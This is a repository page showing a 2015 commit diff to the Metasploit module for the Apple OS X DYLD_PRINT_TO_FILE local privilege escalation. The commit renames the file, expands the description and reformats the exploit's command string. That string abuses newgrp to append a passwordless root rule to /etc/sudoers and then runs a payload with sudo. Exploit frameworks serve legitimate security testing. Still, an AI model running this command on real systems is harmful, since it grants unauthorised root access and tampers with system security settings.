infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

FIxup pr #5758

bug/bundler_fix
Tod Beardsley 2015-07-23 12:21:36 -05:00
parent 165cb195bf
commit 9d8dd2f8bd
No known key found for this signature in database
GPG Key ID: BD63D0A3EA19CAAC
1 changed files with 6 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
modules/exploits/osx/local/dlyd_print_to_file_root.rb → modules/exploits/osx/local/dyld_print_to_file_root.rb
View File

@ -17,8 +17,11 @@ class Metasploit4 < Msf::Exploit::Local
super(update_info(info,
'Name' => 'Apple OS X DYLD_PRINT_TO_FILE Privilege Escalation',
'Description' => %q{
In Mac OS X 10.10.x, the DYLD_PRINT_TO_FILE environment variable is still
supported for suid binaries. This allows an arbitrary file write as root.
In Apple OS X 10.10.4 and prior, the DYLD_PRINT_TO_FILE
environment variable, usually used for redirecting logging data to a
file, instead of the usual stderr. Due to a design error, this feature
can be abused by a local attacker to write arbitrary files as root, via
restricted, SUID root binaries.
},
'Author' => [
'Stefan Esser', # Vulnerability discovery and PoC
@ -69,7 +72,7 @@ class Metasploit4 < Msf::Exploit::Local
end
def sploit
"/bin/sh -c \"echo 'echo \\\"$(whoami) ALL=(ALL) NOPASSWD:ALL\\\" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo #{payload_file} &\""
%q{/bin/sh -c "echo 'echo \\"$(whoami) ALL=(ALL) NOPASSWD:ALL\\" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo #{payload_file} &"}
end
def binary_payload